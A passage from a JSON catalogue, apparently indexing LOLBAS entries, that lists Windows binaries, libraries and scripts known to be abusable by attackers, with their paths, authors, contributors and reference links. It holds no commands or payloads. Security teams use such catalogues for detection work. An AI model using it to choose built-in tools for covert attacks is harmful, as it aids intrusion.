@ihack4falafel"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"],"count":1},{"id":"lolbas:wuauclt-exe","name":"wuauclt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wuauclt.exe","C:\\Windows\\UUS\\amd64\\wuauclt.exe"],"author":"David Middlehurst","created":"2020-09-23T00:00:00.000Z","contributors":["David Middlehurst @dtmsecurity"],"references":["https://lolbas-project.github.io/lolbas/Binaries/wuauclt/"],"count":1},{"id":"lolbas:xwizard-exe","name":"Xwizard.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @Hexacorn","Nick Tyrer @NickTyrer","harr0ey @harr0ey","Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"],"count":3},{"id":"lolbas:msedge-proxy-exe","name":"msedge_proxy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"author":"Mert Daş","created":"2023-08-18T00:00:00.000Z","contributors":["Mert Daş @merterpreter"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"],"count":2},{"id":"lolbas:msedgewebview2-exe","name":"msedgewebview2.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"author":"Matan Bahar","created":"2023-06-15T00:00:00.000Z","contributors":["Uriel Kosayev @MalFuzzer","Hai Vaknin @VakninHai","Tamir Yehuda @Tamirye94","Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"],"count":4},{"id":"lolbas:odbcad32-exe","name":"odbcad32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\odbcad32.exe","c:\\windows\\syswow64\\odbcad32.exe"],"author":"Ekitji","created":"2025-09-04T00:00:00.000Z","contributors":["amonitoring","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/Binaries/odbcad32/"],"count":1},{"id":"lolbas:setupugc-exe","name":"setupugc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"author":"Ang Kar Min","created":"2026-04-20T00:00:00.000Z","contributors":["Ang Kar Min @karminang"],"references":["https://lolbas-project.github.io/lolbas/Binaries/setupugc/"],"count":2},{"id":"lolbas:write-exe","name":"write.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\write.exe","C:\\Windows\\System32\\write.exe","C:\\Windows\\SysWOW64\\write.exe"],"author":"Michal Belzak","created":"2025-06-17T00:00:00.000Z","contributors":["Michal Belzak"],"references":["https://lolbas-project.github.io/lolbas/Binaries/write/"],"count":1},{"id":"lolbas:wt-exe","name":"wt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_<version_packageid>\\wt.exe"],"author":"Nasreddine Bencherchali","created":"2022-07-27T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/wt/"],"count":1},{"id":"lolbas:advpack-dll","name":"Advpack.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy (LaunchINFSection) @bohops","Fabrizio (RegisterOCX - DLL) @0rbz_","Moriarty (RegisterOCX - CMD) @moriarty_meng","Nick Carr (Threat Intel) @ItsReallyNick"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Advpack/"],"count":5},{"id":"lolbas:desk-cpl","name":"Desk.cpl","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"author":"Hai Vaknin","created":"2022-04-21T00:00:00.000Z","contributors":["Rafael S Marques @pegabizu","Pierre-Alexandre Braeken @pabraeken","hai @VakninHai","Christopher Peacock @SecurePeacock","Jose Luis Sanchez @Joseliyo_Jstnk"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Desk/"],"count":2},{"id":"lolbas:dfshim-dll","name":"Dfshim.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Dfshim/"],"count":1},{"id":"lolbas:ieadvpack-dll","name":"Ieadvpack.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy (LaunchINFSection) @bohops","Fabrizio (RegisterOCX - DLL) @0rbz_","Pierre-Alexandre Braeken (RegisterOCX - CMD) @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"],"count":5},{"id":"lolbas:ieframe-dll","name":"Ieframe.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\ieframe.dll","c:\\windows\\syswow64\\ieframe.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"],"count":1},{"id":"lolbas:mshtml-dll","name":"Mshtml.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\mshtml.dll","c:\\windows\\syswow64\\mshtml.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Mshtml/"],"count":1},{"id":"lolbas:pcwutl-dll","name":"Pcwutl.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\pcwutl.dll","c:\\windows\\syswow64\\pcwutl.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Matt harr0ey @harr0ey"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/"],"count":1},{"id":"lolbas:photoviewer-dll","name":"PhotoViewer.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll","C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll"],"author":"Avihay Eldad","created":"2025-06-22T00:00:00.000Z","contributors":["Avihay Eldad @avihayeldad","Tommy Warren"],"references":["https://lolbas-project.github.io/lolbas/Libraries/PhotoViewer/"],"count":1},{"id":"lolbas:scrobj-dll","name":"Scrobj.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\scrobj.dll","c:\\windows\\syswow64\\scrobj.dll"],"author":"Eral4m","created":"2021-01-07T00:00:00.000Z","contributors":["Eral4m @eral4m"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Scrobj/"],"count":1},{"id":"lolbas:setupapi-dll","name":"Setupapi.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan (COM Scriptlet) @KyleHanslovan","Huntress Labs (COM Scriptlet) @HuntressLabs","Casey Smith (COM Scriptlet) @subTee","Nick Carr (Threat Intel) @ItsReallyNick"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"],"count":2},{"id":"lolbas:shdocvw-dll","name":"Shdocvw.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shdocvw.dll","c:\\windows\\syswow64\\shdocvw.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/"],"count":1},{"id":"lolbas:shell32-dll","name":"Shell32.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam (Control_RunDLL, Control_RunDLLNoFallback) @hexacorn","Pierre-Alexandre Braeken (ShellExec_RunDLL) @pabraeken","Matt Graeber (ShellExec_RunDLL) @mattifestation","Kyle Hanslovan (ShellExec_RunDLL) @KyleHanslovan"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Shell32/"],"count":4},{"id":"lolbas:shimgvw-dll","name":"Shimgvw.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shimgvw.dll","c:\\windows\\syswow64\\shimgvw.dll"],"author":"Eral4m","created":"2021-01-06T00:00:00.000Z","contributors":["Eral4m @eral4m"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/"],"count":1},{"id":"lolbas:syssetup-dll","name":"Syssetup.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken (Execute) @pabraeken","Matt harr0ey (Execute) @harr0ey","Jimmy (Scriptlet) @bohops"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"],"count":2},{"id":"lolbas:url-dll","name":"Url.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam (OpenURL) @hexacorn","Jimmy (OpenURL) @bohops","Malwrologist (FileProtocolHandler - HTA) @DissectMalware","r0lan (Obfuscation) @r0lan"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Url/"],"count":6},{"id":"lolbas:zipfldr-dll","name":"Zipfldr.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Moriarty (Execution) @moriarty_meng","r0lan (Obfuscation) @r0lan"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"],"count":2},{"id":"lolbas:comsvcs-dll","name":"Comsvcs.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\comsvcs.dll"],"author":"LOLBAS Team","created":"2019-08-30T00:00:00.000Z","contributors":["modexp"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/"],"count":1},{"id":"lolbas:cl-loadassembly-ps1","name":"CL_LoadAssembly.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/"],"count":1},{"id":"lolbas:cl-mutexverifiers-ps1","name":"CL_Mutexverifiers.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Mutexverifiers/"],"count":1},{"id":"lolbas:cl-invocation-ps1","name":"CL_Invocation.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Invocation/"],"count":1},{"id":"lolbas:launch-vsdevshell-ps1","name":"Launch-VsDevShell.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"author":"Nasreddine Bencherchali","created":"2022-06-13T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"],"count":2},{"id":"lolbas:manage-bde-wsf","name":"Manage-bde.wsf","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Daniel Bohannon @danielbohannon","John Lambert @JohnLaTwC"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"],"count":2},{"id":"lolbas:pubprn-vbs","name":"Pubprn.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs","C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Pubprn/"],"count":1},{"id":"lolbas:syncappvpublishingserver-vbs","name":"Syncappvpublishingserver.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Landers @monoxgas","Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"],"count":1},{"id":"lolbas:utilityfunctions-ps1","name":"UtilityFunctions.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick VanGilder @nickvangilder"],"references":["https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/"],"count":1},{"id":"lolbas:winrm-vbs","name":"winrm.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Matt Nelson @enigma0x3","Casey Smith @subtee","Jimmy @bohops","Red Canary Company cc Tony Lambert @redcanaryco"],"references":["https://lolbas-project.github.io/lolbas/Scripts/winrm/"],"count":3},{"id":"lolbas:pester-bat","name":"Pester.bat","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Emin Atac @p0w3rsh3ll","Stamatis Chatzimangou @_st0pp3r_"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Pester/"],"count":2},{"id":"lolbas:acccheckconsole-exe","name":"AccCheckConsole.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"author":"bohops","created":"2022-01-02T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"],"count":2},{"id":"lolbas:adplus-exe","name":"adplus.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"author":"mr.d0x","created":"2021-09-01T00:00:00.000Z","contributors":["mr.d0x @mrd0x","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"],"count":4},{"id":"lolbas:agentexecutor-exe","name":"AgentExecutor.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"author":"Eleftherios Panos","created":"2020-07-23T00:00:00.000Z","contributors":["Eleftherios Panos @lefterispan"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"],"count":2},{"id":"lolbas:applauncher-exe","name":"AppLauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppLauncher/"],"count":1},{"id":"lolbas:appcert-exe","name":"AppCert.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"author":"Avihay Eldad","created":"2024-03-06T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"],"count":2},{"id":"lolbas:appvlp-exe","name":"Appvlp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["fab @0rbz_","Will @moo_hax","Matt Wilson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"],"count":2},{"id":"lolbas:bcp-exe","name":"Bcp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\bcp.exe"],"author":"Mahir Ali Khan","created":"2025-11-13T00:00:00.000Z","contributors":["Mahir Ali Khan @mahiralikhan07"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bcp/"],"count":1},{"id":"lolbas:bginfo-exe","name":"Bginfo.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"count":6},{"id":"lolbas:cdb-exe","name":"Cdb.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","mr.d0x @mrd0x","Spooky Sec @sec_spooky","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"],"count":3},{"id":"lolbas:coregen-exe","name":"coregen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"author":"Martin Sohn Christensen","created":"2020-10-09T00:00:00.000Z","contributors":["Nicky Tyrer","Evan Pena","Casey Erikson"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"],"count":3},{"id":"lolbas:createdump-exe","name":"Createdump.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe"],"author":"mr.d0x, Daniel Santos","created":"2022-01-20T00:00:00.000Z","contributors":["bopin @bopin2020"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/"],"count":1},{"id":"lolbas:csi-exe","name":"csi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe","c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/csi/"],"count":1},{"id":"lolbas:defaultpack-exe","name":"DefaultPack.EXE","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\DefaultPack\\DefaultPack.exe"],"author":"@checkymander","created":"2020-10-01T00:00:00.000Z","contributors":["checkymander @checkymander"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/"],"count":1},{"id":"lolbas:devinit-exe","name":"Devinit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/"],"count":1},{"id":"lolbas:devtoolslauncher-exe","name":"Devtoolslauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"author":"felamos","created":"2019-10-04T00:00:00.000Z","contributors":["felamos @_felamos"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"],"count":2},{"id":"lolbas:dnx-exe","name":"dnx.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dnx/"],"count":1},{"id":"lolbas:dotnet-exe","name":"Dotnet.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"author":"felamos","created":"2019-11-12T00:00:00.000Z","contributors":["felamos @_felamos","Jimmy @bohops","yamalon @mavinject"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"],"count":4},{"id":"lolbas:dsdbutil-exe","name":"dsdbutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":["dsDbUtil.exe"],"fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"author":"Ekitji","created":"2023-05-31T00:00:00.000Z","contributors":["bohop @bohops","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"],"count":5},{"id":"lolbas:dtutil-exe","name":"dtutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe"],"author":"Avihay Eldad","created":"2024-06-17T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dtutil/"],"count":1},{"id":"lolbas:dump64-exe","name":"Dump64.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe"],"author":"mr.d0x","created":"2021-11-16T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/"],"count":1},{"id":"lolbas:dumpminitool-exe","name":"DumpMinitool.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions\\DumpMinitool.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/"],"count":1},{"id":"lolbas:dxcap-exe","name":"Dxcap.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt harr0ey @harr0ey","Vikas Singh @vikas891","Naor Evgi @ghosts621"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"],"count":2},{"id":"lolbas:ecmangen-exe","name":"ECMangen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft 